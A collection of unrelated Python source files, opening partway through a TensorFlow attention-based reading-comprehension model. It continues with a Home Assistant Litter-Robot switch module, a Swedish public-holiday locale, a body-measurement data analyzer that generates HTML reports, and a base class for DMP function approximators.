Attention" with tf.variable_scope('Attention_gated') as scope: W_uQ = tf.get_variable('W_uQ', shape=(2 * self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_uP = tf.get_variable('W_uP', 
shape=(2 * self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_vP = tf.get_variable('W_vP', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) v_QP = tf.get_variable('v_QP', shape=(self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_g_QP = tf.get_variable('W_g_QP', shape=(4 * self.FLAGS.hidden_size, 4 * self.FLAGS.hidden_size)) # TO DO: add drop prob in FLAGS QP_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) zeros_dim = tf.stack([tf.shape(u_Q)[0], self.FLAGS.hidden_size]) QP_cell_hidden = tf.fill(zeros_dim, 0.0) for t in range(0, self.FLAGS.context_len): # TODO: MOVE THE VARIABLES TO SOMEWHERE ELSE APPROPRIATE WuQ_uQ = tf.tensordot(u_Q, W_uQ, axes = [[2], [0]]) # [batch, q_len, hidden_size] u_P_t = tf.reshape(u_P[:,t,:], (-1, 1, 2 * self.FLAGS.hidden_size)) # slice only 1 context word, [batch_size, 1, 2 * hidden_size] WuP_uP = tf.tensordot(u_P_t, W_uP, axes=[[2],[0]]) # [batch, 1, hidden_size] if t==0: s_t = tf.tensordot(tf.tanh(WuQ_uQ + WuP_uP), v_QP, axes=[[2],[0]]) # returns [batch, q_len] else: v_P_t = tf.reshape(v_P[t-1], (-1, 1, self.FLAGS.hidden_size)) # [batch_size, 1, hidden_size] WvP_vP = tf.tensordot(v_P_t, W_vP, axes=[[2],[0]]) # [batch_size, 1, hidden_size] s_t = tf.tensordot(tf.tanh(WuQ_uQ + WuP_uP + WvP_vP), v_QP, axes=[[2],[0]]) # returns [batch, q_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.qn_mask, 1) # [batch, q_len] # [batch, q_len] , [batch,q_len,2*hidden_size] -> [batch, 2*hidden_size] c_t = tf.einsum('ij,ijk->ik', a_t, u_Q) #[batch,2*hidden_size] uPt_ct = tf.concat([tf.squeeze(u_P_t), c_t], 1) # [batch, 2 * 2 * hidden_size] g_t = tf.nn.sigmoid(tf.matmul(uPt_ct, W_g_QP)) # [batch, 2 * 2 * hidden_size] uPt_ct_star = tf.einsum('ij,ij->ij', g_t, uPt_ct) if t > 0: tf.get_variable_scope().reuse_variables() QP_output, QP_cell_hidden = QP_cell(uPt_ct_star, QP_cell_hidden) # both output and hidden [batch_size, hidden_size] v_P.append(QP_output) v_P = tf.stack(v_P, 1) # [batch, context_len, hidden_size] v_P = tf.nn.dropout(v_P, self.keep_prob) #SELF ATTN print "self attention" with tf.variable_scope("self_matching_attn") as scope: SM_input = [] W_v_P = tf.get_variable('W_v_P', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_v_P_tot = tf.get_variable('W_v_P_tot', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) v_SM = tf.get_variable('v_SM', shape=(self.FLAGS.hidden_size)) for t in range(0, self.FLAGS.context_len): v_j_P = tf.reshape(v_P[:,t,:], (-1, 1, self.FLAGS.hidden_size)) #Slice 1 v_P in time t [batch_size, 1, hidden_size] WvP_vj = tf.tensordot(v_j_P, W_v_P, axes=[[2],[0]]) # [batch, 1, hidden_size] WvPtot_vP = tf.tensordot(v_P, W_v_P_tot, axes=[[2], [0]]) # [batch, context_len, hidden_size] s_t = tf.tensordot(tf.tanh(WvP_vj + WvPtot_vP), v_SM, axes=[[2],[0]]) # [batch, context_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.context_mask, 1) c_t = tf.einsum('ij,ijk->ik', a_t, v_P) #[batch, hidden_size] # add the gate vPt_ct = tf.concat([tf.squeeze(v_j_P), c_t], 1) #[batch, 2 * hidden_size] g_t = tf.nn.sigmoid(vPt_ct) vPt_ct_star = tf.einsum('ij,ij->ij', g_t, vPt_ct) # [batch, 2*hidden_size] SM_input.append(vPt_ct_star) # Someone here just stacked and then unstack, not sure why so I will just directly use SM_input SM_input= 
tf.stack(SM_input, 1) # [batch, context_len, 2 * hidden_size] SM_fwd_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) SM_back_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) (h_P_fwd, h_P_back), SM_final = tf.nn.bidirectional_dynamic_rnn(SM_fwd_cell, SM_back_cell, SM_input, tf.reduce_sum(self.context_mask, reduction_indices=1), dtype=tf.float32) h_P = tf.concat([h_P_fwd, h_P_back], 2) h_P = tf.nn.dropout(h_P, self.keep_prob) #[batch, context_len, 2*hidden_size] # OUTPUT print "output" with tf.variable_scope("Output") as scope: W_ruQ = tf.get_variable('W_ruQ', shape=(2*self.FLAGS.hidden_size, 2*self.FLAGS.hidden_size)) V_rQ = tf.get_variable('V_rQ', shape=(self.FLAGS.question_len, 2*self.FLAGS.hidden_size)) W_vQ = tf.get_variable('W_vQ', shape=(2*self.FLAGS.hidden_size, 2*self.FLAGS.hidden_size)) v_rQ = tf.get_variable('v_rQ', shape=(2 * self.FLAGS.hidden_size)) WuQ_ujQ = tf.tensordot(u_Q, W_ruQ, [[2], [0]]) #[batch, q_len, 2 * hidden_size] WvQ_VrQ = tf.tensordot(V_rQ, W_vQ, [[1], [0]]) #[q_len, 2*hidden_size] s_t = tf.tensordot(tf.tanh(WuQ_ujQ + WvQ_VrQ), v_rQ, axes=[[2],[0]]) # The addition will broadcast # final shape: [batch, q_len] _, a_t = masked_softmax(s_t, self.qn_mask, 1) rQ = tf.einsum('ij,ijk->ik', a_t, u_Q) rQ = tf.nn.dropout(rQ, self.keep_prob) #[batch, 2*hidden_size] h_a = rQ # initial ans pointer p_t = [None]*2 W_hP = tf.get_variable('W_hP', shape=(2*self.FLAGS.hidden_size, self.FLAGS.hidden_size)) W_ha = tf.get_variable('W_ha', shape=(2*self.FLAGS.hidden_size, self.FLAGS.hidden_size)) v_ap = tf.get_variable('v_ap', shape=(self.FLAGS.hidden_size)) # answer pointer bias ans_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(2 * self.FLAGS.hidden_size), self.keep_prob) for t in range(0,2): # run thru RNN 2 times (cuz one start one end) WhP_hP = tf.tensordot(h_P, W_hP, [[2],[0]]) #[batch, context_len, hidden_size] Wha_ha = tf.reshape(tf.tensordot(h_a, W_ha, [[1],[0]]), (-1, 1, self.FLAGS.hidden_size)) #[batch, 1, encode] s_t = tf.tensordot(tf.tanh(WhP_hP + Wha_ha), v_ap, axes=[[2], [0]]) # [batch, context_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.context_mask, 1) if t == 0: self.logits_start = a_t #[batch, context_alen] else: self.logits_end = a_t c_t = tf.einsum('ij,ijk->ik', a_t, h_P) #[batch, 2*encode] if t==0: h_a, _ = ans_cell(c_t, h_a) # h_a = [batch, 2*encode] print "complete" def add_loss(self): with vs.variable_scope("loss"): # Calculate loss for prediction of start position loss_start = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits_start, labels=self.ans_span[:, 0]) # loss_start has shape (batch_size) self.loss_start = tf.reduce_mean(loss_start) # scalar. avg across batch tf.summary.scalar('loss_start', self.loss_start) # log to tensorboard # Calculate loss for prediction of end position loss_end = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits_end, labels=self.ans_span[:, 1]) self.loss_end = tf.reduce_mean(loss_end) tf.summary.scalar('loss_end', self.loss_end) # Add the two losses self.loss = self.loss_start + self.loss_end tf.summary.scalar('loss', self.loss) def run_train_iter(self, session, batch, summary_writer): """ This performs a single training iteration (forward pass, loss computation, backprop, parameter update) Inputs: session: TensorFlow session batch: a Batch object summary_writer: for Tensorboard Returns: loss: The loss (averaged across the batch) for this batch. 
global_step: The current number of training iterations we've done param_norm: Global norm of the parameters gradient_norm: Global norm of the gradients """ # Match up our input data with the placeholders input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask input_feed[self.ans_span] = batch.ans_span input_feed[self.keep_prob] = 1.0 - self.FLAGS.dropout # apply dropout # output_feed contains the things we want to fetch. output_feed = [self.updates, self.summaries, self.loss, self.global_step, self.param_norm, self.gradient_norm] # Run the model [_, summaries, loss, global_step, param_norm, gradient_norm] = session.run(output_feed, input_feed) # All summaries in the graph are added to Tensorboard summary_writer.add_summary(summaries, global_step) return loss, global_step, param_norm, gradient_norm def get_loss(self, session, batch): input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask input_feed[self.ans_span] = batch.ans_span # note you don't supply keep_prob here, so it will default to 1 i.e. no dropout output_feed = [self.loss] [loss] = session.run(output_feed, input_feed) return loss def get_prob_dists(self, session, batch): input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask # note you don't supply keep_prob here, so it will default to 1 i.e. no dropout output_feed = [self.probdist_start, self.probdist_end] [probdist_start, probdist_end] = session.run(output_feed, input_feed) return probdist_start, probdist_end def get_start_end_pos(self, session, batch): # Get start_dist and end_dist, both shape (batch_size, context_len) start_dist, end_dist = self.get_prob_dists(session, batch) # Take argmax to get start_pos and end_post, both shape (batch_size) start_pos = np.argmax(start_dist, axis=1) end_pos = np.argmax(end_dist, axis=1) return start_pos, end_pos def get_dev_loss(self, session, dev_context_path, dev_qn_path, dev_ans_path): logging.info("Calculating dev loss...") tic = time.time() loss_per_batch, batch_lengths = [], [] # Iterate over dev set batches # Note: here we set discard_long=True, meaning we discard any examples # which are longer than our context_len or question_len. # We need to do this because if, for example, the true answer is cut # off the context, then the loss function is undefined. for batch in get_batch_generator(self.word2id, dev_context_path, dev_qn_path, dev_ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=True): # Get loss for this batch loss = self.get_loss(session, batch) curr_batch_size = batch.batch_size loss_per_batch.append(loss * curr_batch_size) batch_lengths.append(curr_batch_size) # Calculate average loss total_num_examples = sum(batch_lengths) toc = time.time() print "Computed dev loss over %i examples in %.2f seconds" % (total_num_examples, toc-tic) # Overall loss is total loss divided by total number of examples dev_loss = sum(loss_per_batch) / float(total_num_examples) return dev_loss def check_f1_em(self, session, context_path, qn_path, ans_path, dataset, num_samples=100, print_to_screen=False): logging.info("Calculating F1/EM for %s examples in %s set..." 
% (str(num_samples) if num_samples != 0 else "all", dataset)) f1_total = 0. em_total = 0. example_num = 0 tic = time.time() # Note here we select discard_long=False because we want to sample from the entire dataset # That means we're truncating, rather than discarding, examples with too-long context or questions for batch in get_batch_generator(self.word2id, context_path, qn_path, ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=False): pred_start_pos, pred_end_pos = self.get_start_end_pos(session, batch) # Convert the start and end positions to lists length batch_size pred_start_pos = pred_start_pos.tolist() # list length batch_size pred_end_pos = pred_end_pos.tolist() # list length batch_size for ex_idx, (pred_ans_start, pred_ans_end, true_ans_tokens) in enumerate(zip(pred_start_pos, pred_end_pos, batch.ans_tokens)): example_num += 1 # Get the predicted answer # Important: batch.context_tokens contains the original words (no UNKs) # You need to use the original no-UNK version when measuring F1/EM pred_ans_tokens = batch.context_tokens[ex_idx][pred_ans_start : pred_ans_end + 1] pred_answer = " ".join(pred_ans_tokens) # Get true answer (no UNKs) true_answer = " ".join(true_ans_tokens) # Calc F1/EM f1 = f1_score(pred_answer, true_answer) em = exact_match_score(pred_answer, true_answer) f1_total += f1 em_total += em # Optionally pretty-print if print_to_screen: print_example(self.word2id, batch.context_tokens[ex_idx], batch.qn_tokens[ex_idx], batch.ans_span[ex_idx, 0], batch.ans_span[ex_idx, 1], pred_ans_start, pred_ans_end, true_answer, pred_answer, f1, em) if num_samples != 0 and example_num >= num_samples: break if num_samples != 0 and example_num >= num_samples: break f1_total /= example_num em_total /= example_num toc = time.time() logging.info("Calculating F1/EM for %i examples in %s set took %.2f seconds" % (example_num, dataset, toc-tic)) return f1_total, em_total def train(self, session, train_context_path, train_qn_path, train_ans_path, dev_qn_path, dev_context_path, dev_ans_path): # Print number of model parameters tic = time.time() params = tf.trainable_variables() num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params)) toc = time.time() logging.info("Number of params: %d (retrieval took %f secs)" % (num_params, toc - tic)) # We will keep track of exponentially-smoothed loss exp_loss = None # Checkpoint management. 
# We keep one latest checkpoint, and one best checkpoint (early stopping) checkpoint_path = os.path.join(self.FLAGS.train_dir, "qa.ckpt") bestmodel_dir = os.path.join(self.FLAGS.train_dir, "best_checkpoint") bestmodel_ckpt_path = os.path.join(bestmodel_dir, "qa_best.ckpt") best_dev_f1 = None best_dev_em = None # for TensorBoard summary_writer = tf.summary.FileWriter(self.FLAGS.train_dir, session.graph) epoch = 0 logging.info("Beginning training loop...") while self.FLAGS.num_epochs == 0 or epoch < self.FLAGS.num_epochs: epoch += 1 epoch_tic = time.time() # Loop over batches for batch in get_batch_generator(self.word2id, train_context_path, train_qn_path, train_ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=True): # Run training iteration iter_tic = time.time() loss, global_step, param_norm, grad_norm = self.run_train_iter(session, batch, summary_writer) iter_toc = time.time() iter_time = iter_toc - iter_tic # Update exponentially-smoothed loss if not exp_loss: # first iter exp_loss = loss else: exp_loss = 0.99 * exp_loss + 0.01 * loss # Sometimes print info to screen if global_step % self.FLAGS.print_every == 0: logging.info( 'epoch %d, iter %d, loss %.5f, smoothed loss %.5f, grad norm %.5f, param norm %.5f, batch time %.3f' % (epoch, global_step, loss, exp_loss, grad_norm, param_norm, iter_time)) # Sometimes save model if global_step % self.FLAGS.save_every == 0: logging.info("Saving to %s..." % checkpoint_path) self.saver.save(session, checkpoint_path, global_step=global_step) # Sometimes evaluate model on dev loss, train F1/EM and dev F1/EM if global_step % self.FLAGS.eval_every == 0: # Get loss for entire dev set and log to tensorboard dev_loss = self.get_dev_loss(session, dev_context_path, dev_qn_path, dev_ans_path) logging.info("Epoch %d, Iter %d, dev loss: %f" % (epoch, global_step, dev_loss)) write_summary(dev_loss, "dev/loss", summary_writer, global_step) # Get F1/EM on train set and log to tensorboard train_f1, train_em = self.check_f1_em(session, train_context_path, train_qn_path, train_ans_path, "train", num_samples=1000) logging.info("Epoch %d, Iter %d, Train F1 score: %f, Train EM score: %f" % (epoch, global_step, train_f1, train_em)) write_summary(train_f1, "train/F1", summary_writer, global_step) write_summary(train_em, "train/EM", summary_writer, global_step) # Get F1/EM on dev set and log to tensorboard dev_f1, dev_em = self.check_f1_em(session, dev_context_path, dev_qn_path, dev_ans_path, "dev", num_samples=0) logging.info("Epoch %d, Iter %d, Dev F1 score: %f, Dev EM score: %f" % (epoch, global_step, dev_f1, dev_em)) write_summary(dev_f1, "dev/F1", summary_writer, global_step) write_summary(dev_em, "dev/EM", summary_writer, global_step) # Early stopping based on dev EM. You could switch this to use F1 instead. if best_dev_em is None or dev_em > best_dev_em: best_dev_em = dev_em logging.info("Saving to %s..." % bestmodel_ckpt_path) self.bestmodel_saver.save(session, bestmodel_ckpt_path, global_step=global_step) epoch_toc = time.time() logging.info("End of epoch %i. Time for epoch: %f" % (epoch, epoch_toc-epoch_tic)) sys.stdout.flush() def write_summary(value, tag, summary_writer, global_step): summary = tf.Summary() summary.value.add(tag=tag, simple_value=value) summary_writer.add_summary(summary, global_step)
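# --- Standalone sketch (plain NumPy, not part of the TF graph above) -------------------
# Mirrors the masked attention pooling used throughout build_graph():
#   s_t -> masked_softmax -> a_t, then c_t = tf.einsum('ij,ijk->ik', a_t, values).
import numpy as np

def masked_attention_pool(scores, values, mask):
    """scores: (batch, seq), values: (batch, seq, dim), mask: (batch, seq) of 0/1 floats.
    Assumes every row of `mask` has at least one unmasked position."""
    scores = scores + (1.0 - mask) * -1e30                 # drive padded positions to ~0 weight
    scores = scores - scores.max(axis=1, keepdims=True)    # numerical stability
    weights = np.exp(scores) * mask
    weights = weights / weights.sum(axis=1, keepdims=True)
    return np.einsum('ij,ijk->ik', weights, values)        # (batch, dim) context vectors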
"""Support for Litter-Robot switches.""" from homeassistant.helpers.entity import ToggleEntity from .const import DOMAIN from .hub import LitterRobotEntity class LitterRobotNightLightModeSwitch(LitterRobotEntity, ToggleEntity): """Litter-Robot Night Light Mode Switch.""" @property def is_on(self): """Return true if switch is on.""" return self.robot.night_light_active @property def icon(self): """Return the icon.""" return "mdi:lightbulb-on" if self.is_on else "mdi:lightbulb-off" async def async_turn_on(self, **kwargs): """Turn the switch on.""" await self.perform_action_and_refresh(self.robot.set_night_light, True) async def async_turn_off(self, **kwargs): """Turn the switch off.""" await self.perform_action_and_refresh(self.robot.set_night_light, False) class LitterRobotPanelLockoutSwitch(LitterRobotEntity, ToggleEntity): """Litter-Robot Panel Lockout Switch.""" @property def is_on(self): """Return true if switch is on.""" return self.robot.panel_lock_active @property def icon(self): """Return the icon.""" return "mdi:lock" if self.is_on else "mdi:lock-open" async def async_turn_on(self, **kwargs): """Turn the switch on.""" await self.perform_action_and_refresh(self.robot.set_panel_lockout, True) async def async_turn_off(self, **kwargs): """Turn the switch off.""" await self.perform_action_and_refresh(self.robot.set_panel_lockout, False) ROBOT_SWITCHES = { "Night Light Mode": LitterRobotNightLightModeSwitch, "Panel Lockout": LitterRobotPanelLockoutSwitch, } async def async_setup_entry(hass, config_entry, async_add_entities): """Set up Litter-Robot switches using config entry.""" hub = hass.data[DOMAIN][config_entry.entry_id] entities = [] for robot in hub.account.robots: for switch_type, switch_class in ROBOT_SWITCHES.items(): entities.append(switch_class(robot, switch_type, hub)) if entities: async_add_entities(entities, True)
# coding=utf-8 from dateutil.easter import EASTER_WESTERN from holidata.utils import SmartDayArrow from .holidays import Locale, Holiday """ source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/lag-1989253-om-allmanna-helgdagar_sfs-1989-253 source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/semesterlag-1977480_sfs-1977-480 """ class sv_SE(Locale): """ 01-01: [NF] Nyårsdagen 01-06: [NRF] Trettondedag jul 05-01: [NF] Första maj 06-06: [NF] Nationaldagen 12-24: [NRF] Julafton 12-25: [NRF] Juldagen 12-26: [NRF] Annandag jul 12-31: [NF] Nyårsafton 2 days before Easter: [NRV] Långfredagen Easter: [NRV] Påskdagen 1 day after Easter: [NRV] Annandag påsk 39 days after Easter: [NRV] Kristi himmelsfärdsdag 49 days after Easter: [NRV] Pingstdagen """ locale = "sv-SE" easter_type = EASTER_WESTERN def __midsommar(self): """ Find the Saturday between 20 and 26 June """ return SmartDayArrow(self.year, 6, 19).shift_to_weekday('saturday', order=1, reverse=False) def holiday_midsommarafton(self): """ The day before midsommardagen: [NV] Midsommarafton """ return [Holiday( self.locale, "", self.__midsommar().shift(days=-1), "Midsommarafton", "NV" )] def holiday_midsommardagen(self): """ Saturday between 20 and 26 June: [NV] Midsommardagen """ return [Holiday( self.locale, "", self.__midsommar(), "Midsommardagen", "NV" )] def holiday_alla_helgons_dag(self): """ Saturday between 31 October and 6 November: [NRV] Alla helgons dag """ return [Holiday( self.locale, "", SmartDayArrow(self.year, 10, 30).shift_to_weekday('saturday', order=1, reverse=False), "Alla helgons dag", "NRV" )]
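# --- Standalone sketch (plain datetime, independent of SmartDayArrow) ------------------
# Illustrates the "Saturday between 20 and 26 June" rule implemented by __midsommar above.
from datetime import date, timedelta

def midsommardagen(year):
    d = date(year, 6, 20)
    while d.weekday() != 5:  # 5 == Saturday
        d += timedelta(days=1)
    return d

# midsommardagen(2023) == date(2023, 6, 24); Midsommarafton is the preceding Friday.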
################################################################ __author__='acgreyjo' # # The file handles and controls the post processing of the user # data and parsing the user configuration in order to determine # the type of analysis to perform. # ################################################################ import os import sys import importlib import argparse import pandas as pd import io import requests from datetime import datetime sys.path.append(r'../../application') from processor import * class Analyzer(object): def __init__(self, setup_config='', proxy=''): self.config_file = setup_config self.proxy = proxy self.task_name = '' self.dFrame = None self.url_to_data = '' self.output_file_path = '' self.program_name = '' self.groupby_column = [] self.ignore_column = [] self.treatment_column = [] self.x_column = [] self.y_column = [] self.dist_types = [] self.input_validate() self.results = {} def input_validate(self): ''' Function validates user input found in the configuration file that is passed in. Ensure that default class variables are present :return: None ''' setup_mod_obj = None if self.config_file: abs_path = os.path.abspath(self.config_file) print('[-i-] Current Path:', abs_path) spec = importlib.util.spec_from_file_location(abs_path, abs_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) setup_mod_obj = module assert hasattr(setup_mod_obj, 'url_to_data') assert hasattr(setup_mod_obj, 'task_name') assert hasattr(setup_mod_obj, 'output_file_path') assert hasattr(setup_mod_obj, 'hdf5_file_name') assert hasattr(setup_mod_obj, 'column_groupby') assert hasattr(setup_mod_obj, 'program_name') assert hasattr(setup_mod_obj, 'ignore_columns') assert hasattr(setup_mod_obj, 'treatment_column') assert hasattr(setup_mod_obj, 'x_column') assert hasattr(setup_mod_obj, 'y_column') assert hasattr(setup_mod_obj, 'dist_type') self.url_to_data = setup_mod_obj.url_to_data self.task_name = setup_mod_obj.task_name self.output_file_path = setup_mod_obj.output_file_path self.groupby_column = setup_mod_obj.column_groupby self.program_name = setup_mod_obj.program_name self.ignore_column = setup_mod_obj.ignore_columns self.treatment_column = setup_mod_obj.treatment_column self.x_column = setup_mod_obj.x_column self.y_column = setup_mod_obj.y_column self.dist_types = setup_mod_obj.dist_type print('[-i-] Config Validation Completed.') def load_data(self): ''' This dataset contains 21 body dimension measurements as well as age, weight, height, and gender on 507 individuals. The 247 men and 260 women were primarily individuals in their twenties and thirties, with a scattering of older men and women, all exercising several hours a week. SOURCE: Measurements were initially taken by the first two authors - Grete Heinz and Louis J. Peterson - at San Jose State University and at the U.S. Naval Postgraduate School in Monterey, California. Later, measurements were taken at dozens of California health and fitness clubs by technicians under the supervision of one of these authors. 
:return: dataFrame ''' headers = ['Biacromial diameter', 'Biiliac diameter', 'Bitrochanteric', 'Chest depth', 'Chest diameter', 'Elbow diameter', 'Wrist diameter', 'Knee diameter', 'Ankle diameter', 'Shoulder girth', 'Chest girth', 'Waist girth', 'Navel girth', 'Hip girth', 'Thigh girth', 'Bicep girth', 'Forearm girth', 'Knee girth', 'Calf maximum girth', 'Ankle minimum girth', 'Wrist minimum girth', 'Age', 'Weight', 'Height', 'Gender' ] try: _df = pd.read_csv(self.url_to_data, delim_whitespace=True) except Exception as e: print('[-w-] Using proxy.....') stream = requests.get(self.url_to_data, proxies={'http': self.proxy}).text _df = pd.read_csv(io.StringIO(stream), delim_whitespace=True) # set header and replace gender column to categorical _df.columns = headers _df['Gender'] = _df['Gender'].apply(lambda x: 'M' if x == 1 else 'F') self.dFrame = _df print('[-i-] DataFrame:\n', self.dFrame.head()) # self.write_data(r'data\inputdata.csv') def write_data(self, file_path=''): ''' writes dataframe data to local store :param file_path: internal file location :return: None ''' if not self.dFrame.empty: self.dFrame.to_csv(file_path, index=False) def process_data(self): ''' process and plot base on distribution :return: ''' for plot_type in self.dist_types: print(f'[-i-] Running Plot type: {plot_type}') if plot_type.lower() == 'dist': print('Processing for dist.') # from analytika.application.dist import Dist from analyze.dist import Dist dist_obj = Dist() elif plot_type.lower() == 'dist_by': print('Processing for distby') from analyze.dist_by import Dist_By dist_obj = Dist_By() elif plot_type.lower() == 'hist_2d': print('Processings for Hist2D') from analyze.hist_2d import Hist_2D dist_obj = Hist_2D() elif plot_type.lower() == 'box': from analyze.box import Box dist_obj = Box() elif plot_type.lower() == 'var': print('Processing for variability') dist_obj.dFrame = self.dFrame dist_obj.task_name = self.task_name dist_obj.x_columns = self.x_column dist_obj.y_columns = self.y_column dist_obj.groupby = self.groupby_column if dist_obj: dist_obj.visualize() self.results[plot_type] = dist_obj.results def create_folder(self, use_folder=''): ''' with current setting os.getcwd() should be equal to public folder /analytika/public :param use_folder: :return: ''' if not use_folder: # create default task folders without datetime stamps use_folder = os.path.join(os.getcwd(),'application','scheduledOutput',self.task_name) print(use_folder) if not os.path.exists(use_folder): os.makedirs(use_folder) def generate_report(self): # generate datetime and use as sub-folder date = datetime.now() cur_date = date.strftime("%Y-%m-%d_%H-%M-%S") tmp_str = '' for idx,dist_type in enumerate(self.dist_types): print(f'[-i-] Generate Report:{dist_type}') tmp_str += ''' <div class="card_stack"> <h1>Card {}</h1> {} </div> '''.format(str(idx), self.results[dist_type].output_plots[0]) template = ''' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="ie=edge" /> <title></title> <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.4.1/css/bootstrap.min.css" /> <link rel="stylesheet" href="../../../../css/index.css" /> </head> <body> <main> {} </main> </body> </html> '''.format(tmp_str) # write out report # use_folder = os.path.join(os.getcwd(), '..', 'application', 'scheduledOutput', self.task_name, cur_date) use_folder = 
os.path.join(os.getcwd(),'application', 'scheduledOutput', self.task_name, cur_date) self.create_folder(use_folder=use_folder) file_path = os.path.join(use_folder, 'report.html') with open(file_path,'w') as hdl: hdl.write(template) def parse_options(): # parse the command line input parser = argparse.ArgumentParser() parser.add_argument('-setup', required=True, action='store') parser.add_argument('-proxy', required=False, action='store') parser.add_argument('-debug', required=False, action='store_true') args = parser.parse_args() return args # entry point if __name__ == '__main__': print('[-i-] Analyzer Starting...') options = parse_options() config_file = options.setup use_proxy = options.proxy run_analyzer = Analyzer(setup_config=config_file, proxy=use_proxy) run_analyzer.create_folder() run_analyzer.load_data() run_analyzer.process_data() run_analyzer.generate_report() print('[-i-] Task Completed.')
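# --- Hypothetical setup config sketch (values are placeholders) ------------------------
# input_validate() above asserts exactly these module-level attribute names; a real config
# module passed via `-setup` would define them with project-specific values.
url_to_data = 'https://example.com/body.dat'   # placeholder; any whitespace-delimited table
task_name = 'body_dimensions'
output_file_path = 'output'
hdf5_file_name = 'results.h5'
column_groupby = ['Gender']
program_name = 'analyzer'
ignore_columns = []
treatment_column = []
x_column = ['Height']
y_column = ['Weight']
dist_type = ['dist']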
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Created on Mon Oct 30 19:00:00 2017

@author: gsutanto
"""

import numpy as np
import os
import sys
import copy
from CanonicalSystem import *


class FunctionApproximator:
  "Base class for function approximators of DMPs."

  def __init__(self,
               dmp_num_dimensions_init,
               model_size_init,
               canonical_system,
               name=""):
    self.name = name
    self.dmp_num_dimensions = dmp_num_dimensions_init
    self.model_size = model_size_init
    self.canonical_sys = canonical_system
    self.weights = np.zeros((self.dmp_num_dimensions, self.model_size))

  def isValid(self):
    assert (self.dmp_num_dimensions > 0), "self.dmp_num_dimensions=" + str(
        self.dmp_num_dimensions) + "<= 0 (invalid!)"
    assert (self.model_size >
            0), "self.model_size=" + str(self.model_size) + "<= 0 (invalid!)"
    assert (self.canonical_sys !=
            None), "CanonicalSystem canonical_sys does NOT exist!"
    assert (self.canonical_sys.isValid()
           ), "CanonicalSystem canonical_sys is invalid!"
    assert (
        (self.weights.shape[0] == self.dmp_num_dimensions) and
        (self.weights.shape[1] == self.model_size)
    ), "Weights matrix dimensions=" + str(self.weights.shape[0]) + "X" + str(
        self.weights.shape[1]
    ) + " is/are mis-matched with self.dmp_num_dimensions=" + str(
        self.dmp_num_dimensions) + " and/or self.model_size=" + str(
            self.model_size)
    return True

  def getWeights(self):
    assert (self.isValid())
    return copy.copy(self.weights)

  def setWeights(self, new_weights):
    assert (self.isValid())
    assert (new_weights.shape == (self.dmp_num_dimensions, self.model_size))
    self.weights = copy.copy(new_weights)
    return None
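# --- Hedged usage sketch (not part of the original module) -----------------------------
# A stub stands in for a real CanonicalSystem; only isValid() is needed by the weight
# accessors exercised here.
class _StubCanonicalSystem:

  def isValid(self):
    return True


fa = FunctionApproximator(dmp_num_dimensions_init=3, model_size_init=25,
                          canonical_system=_StubCanonicalSystem(), name="demo")
fa.setWeights(np.random.randn(3, 25))
print(fa.getWeights().shape)  # (3, 25)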
